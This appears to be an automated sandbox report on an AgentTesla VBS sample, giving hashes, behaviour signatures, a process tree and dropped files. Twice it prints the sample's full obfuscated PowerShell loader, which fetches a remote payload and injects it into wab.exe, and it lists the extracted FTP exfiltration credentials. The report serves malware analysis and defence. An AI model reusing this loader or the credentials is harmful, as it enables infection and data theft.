Overview

overview

10

Static

static

1

3c00879a0e...4f.vbs

windows7-x64

10

3c00879a0e...4f.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    147s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24-04-2024 07:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3c00879a0e4e4a7d7b78bb8611bcc94f.vbs

  • Size

    59KB

  • MD5

    3c00879a0e4e4a7d7b78bb8611bcc94f

  • SHA1

    3ddd2f54b7fb54df60134318515fd61b119bc46f

  • SHA256

    94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f

  • SHA512

    4dfce826cf9f7456dd981b4a1b4c985d75c9c849434a94c5987bd08fe037217b5160441e23072c498b5e9c93e2d00d8c6e814ea1736e68724aa461881ab1b31c

  • SSDEEP

    1536:cdukLI1gPDPTxyk0MfFCNqnlAEfen8TCQr:Yukk1gPDJzoGaEWn8Tv

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.concaribe.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    2ogFj^8ECV(?

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3c00879a0e4e4a7d7b78bb8611bcc94f.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2868
    • C:\Windows\System32\ping.exe
      ping google.com -n 1
      2⤵
      • Runs ping.exe
      PID:2624
    • C:\Windows\System32\ping.exe
      ping %.%.%.%
      2⤵
      • Runs ping.exe
      PID:2588
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c dir
      2⤵
        PID:2600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
          3⤵
            PID:1988
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
            3⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1040
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
              4⤵
                PID:1860
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2328

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IS89EXWCSIA5X55RII6T.temp
          Filesize

          7KB

          MD5

          308d8aac18e84a76808a69130850920d

          SHA1

          4357d9f007ca49c2d59e66fdf38533aa69c40008

          SHA256

          9ac865085ca1138ac142856a6f616f30e41ea624db4be36d08e94de825eaf0ff

          SHA512

          12b32abed0323a74282dfec0ada9f014a9de6fd2eff2cdf79ca043cf0bf9ec51d254b598f1aee18a5905487d301804df646251ca1b749aa6b89b884493fab699

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Veredict.mou
          Filesize

          430KB

          MD5

          446bd53386a67b6e402c67f8077b3a9e

          SHA1

          11d006e1c77dddfff4559bef35ec15bd01fb8cbc

          SHA256

          85f74a4e42fd58c712bfce653b8eb1d71c57793e22daf9529c7c916c4660dfc4

          SHA512

          1afae58e5cbedc6c2aaa7779bb9217f1cf00aff240a9bdbdc41394a30cc1bd59181a83c8fd62fb636d34b0be41cb8a277c64c9126d52881324cbcff27753e838

          Download Submit
        • memory/1040-42-0x0000000005E20000-0x0000000005F20000-memory.dmp
          Filesize

          1024KB

          Download
        • memory/1040-41-0x0000000002480000-0x00000000024C0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1040-58-0x0000000073680000-0x0000000073C2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1040-43-0x0000000073680000-0x0000000073C2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1040-44-0x0000000073680000-0x0000000073C2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1040-52-0x0000000077830000-0x0000000077906000-memory.dmp
          Filesize

          856KB

          Download
        • memory/1040-51-0x0000000077640000-0x00000000777E9000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/1040-33-0x0000000073680000-0x0000000073C2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1040-34-0x0000000002480000-0x00000000024C0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1040-35-0x0000000002480000-0x00000000024C0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1040-50-0x0000000005E20000-0x0000000005F20000-memory.dmp
          Filesize

          1024KB

          Download
        • memory/1040-37-0x0000000002480000-0x00000000024C0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1040-47-0x0000000002480000-0x00000000024C0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1040-46-0x00000000063E0000-0x000000000A70F000-memory.dmp
          Filesize

          67.2MB

          Download
        • memory/1040-45-0x00000000050F0000-0x00000000050F1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2328-53-0x0000000077640000-0x00000000777E9000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/2328-60-0x0000000000B20000-0x0000000000B62000-memory.dmp
          Filesize

          264KB

          Download
        • memory/2328-66-0x0000000023970000-0x00000000239B0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2328-65-0x0000000073540000-0x0000000073C2E000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2328-62-0x0000000023970000-0x00000000239B0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2328-61-0x0000000073540000-0x0000000073C2E000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2328-56-0x0000000000B20000-0x0000000001B82000-memory.dmp
          Filesize

          16.4MB

          Download
        • memory/2328-55-0x0000000077866000-0x0000000077867000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2328-54-0x0000000077830000-0x0000000077906000-memory.dmp
          Filesize

          856KB

          Download
        • memory/2672-28-0x0000000002A70000-0x0000000002AF0000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2672-21-0x000000001B3A0000-0x000000001B682000-memory.dmp
          Filesize

          2.9MB

          Download
        • memory/2672-26-0x0000000002A70000-0x0000000002AF0000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2672-36-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
          Filesize

          9.6MB

          Download
        • memory/2672-22-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
          Filesize

          9.6MB

          Download
        • memory/2672-23-0x0000000002A70000-0x0000000002AF0000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2672-59-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
          Filesize

          9.6MB

          Download
        • memory/2672-24-0x0000000002A70000-0x0000000002AF0000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2672-39-0x0000000002A70000-0x0000000002AF0000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2672-40-0x0000000002A70000-0x0000000002AF0000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2672-25-0x0000000002410000-0x0000000002418000-memory.dmp
          Filesize

          32KB

          Download
        • memory/2672-27-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
          Filesize

          9.6MB

          Download